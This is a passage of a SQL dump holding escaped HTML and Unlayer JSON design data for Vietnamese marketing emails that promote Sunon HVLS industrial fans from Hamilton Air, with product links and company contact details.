(mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"background-color: #ecf0f1;width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680169223539-remote-control.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 180px;\\\" width=\\\"180\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"background-color: #ecf0f1;width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"background-color: #ecf0f1;width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680169233314-bien-tan.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 180px;\\\" width=\\\"180\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #ecf0f1;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #95a5a6;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:2px 10px 6px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><strong>V\\u1ecb tr\\u00ed &amp; Kho\\u1ea3ng tr\\u1ed1ng gi\\u1eefa Qu\\u1ea1t v\\u00e0 V\\u1eadt c\\u1ea3n<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681372344847-6%2018.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/ceilingfan.vn\\/en\\/sunon-powerful-series-1\\\" style=\\\"height:47px; v-text-anchor:middle; width:246px;\\\" arcsize=\\\"85%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#4fbbd8\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/ceilingfan.vn\\/en\\/sunon-powerful-series-1\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #4fbbd8; border-radius: 40px;-webkit-border-radius: 40px; -moz-border-radius: 40px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:15px 44px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM - V\\u1ec0 SUNON<\\/span><\\/strong><\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:4px 33px 7px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: \'Source Sans Pro\',sans-serif; font-size: 22px; font-weight: 700; color: #236fa1; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 30.8px; font-family: \'Source Sans Pro\', sans-serif;\\\">Kh\\u00f4ng Ch\\u1ec9 L\\u00e0 M\\u00e1t - M\\u00e0 C\\u00f2n H\\u01a1n Th\\u1ebf N\\u1eefa<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #272362;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #272362;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #ecf0f1;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"tel:02873033369\\\" style=\\\"height:37px; v-text-anchor:middle; width:101px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#74bcda\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"tel:02873033369\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #74bcda; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">CALLL NGAY <\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:23px 40px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #b8b8b8; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"color: #000000; line-height: 19.6px;\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<\\/span><br \\/><span style=\\\"color: #000000; line-height: 19.6px;\\\">EMAIL: sale@hogiaphat.vn\\u00a0<\\/span><br \\/><span style=\\\"color: #000000; line-height: 19.6px;\\\">SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"color: #000000; line-height: 19.6px;\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #bbbbbb; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px; color: #000000;\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px; color: #000000;\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"');
INSERT INTO `tblma_emails` (`id`, `name`, `type`, `category`, `segment`, `published`, `language`, `description`, `addedfrom`, `dateadded`, `color`, `subject`, `email_template`, `from_name`, `from_address`, `reply_to_address`, `bcc_address`, `attachment`, `data_design`, `data_html`) VALUES
(11, 'Sunon - Powerful HVLS Fan series 3', '', 9, 0, 1, 'vietnamese', '', 18, '2023-04-13 10:11:57', '', 'Sunon - Powerful HVLS Fan series 3', 17, '', '', '', '', '', '\"{\\\"counters\\\":{\\\"u_row\\\":23,\\\"u_column\\\":54,\\\"u_content_text\\\":27,\\\"u_content_image\\\":30,\\\"u_content_button\\\":32,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":11,\\\"u_content_heading\\\":8,\\\"u_content_text_deprecated\\\":1,\\\"u_content_html\\\":1,\\\"u_content_menu\\\":1},\\\"body\\\":{\\\"id\\\":\\\"nY2UpNg7xs\\\",\\\"rows\\\":[{\\\"id\\\":\\\"CvMouKqZza\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"MIyWoeK0P3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wkMmc2BYL9\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 19px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167194545-logo_sunon.png\\\",\\\"width\\\":1280,\\\"height\\\":375,\\\"maxWidth\\\":\\\"81%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"_override\\\":{\\\"mobile\\\":{\\\"src\\\":{\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":false},\\\"containerPadding\\\":\\\"10px\\\"}}}},{\\\"id\\\":\\\"ElSvBo9Wp2\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"20px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_8\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"GI\\u1ea2I PH\\u00c1P TI\\u1ebeT KI\\u1ec6M N\\u0102NG L\\u01af\\u1ee2NG, L\\u00c0M M\\u00c1T, CH\\u1ed0NG \\u1ea8M V\\u00c0 TH\\u00d4NG GI\\u00d3\\\"}},{\\\"id\\\":\\\"mWDZmdczN4\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"4px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#000000\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 150%;\\\\\\\"><span style=\\\\\\\"font-size: 18px; line-height: 21px;\\\\\\\"><strong>T\\u1eacN H\\u01af\\u1edeNG CU\\u1ed8C S\\u1ed0NG THO\\u1ea2I M\\u00c1I<\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"Al64RPrqki\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"6px 10px 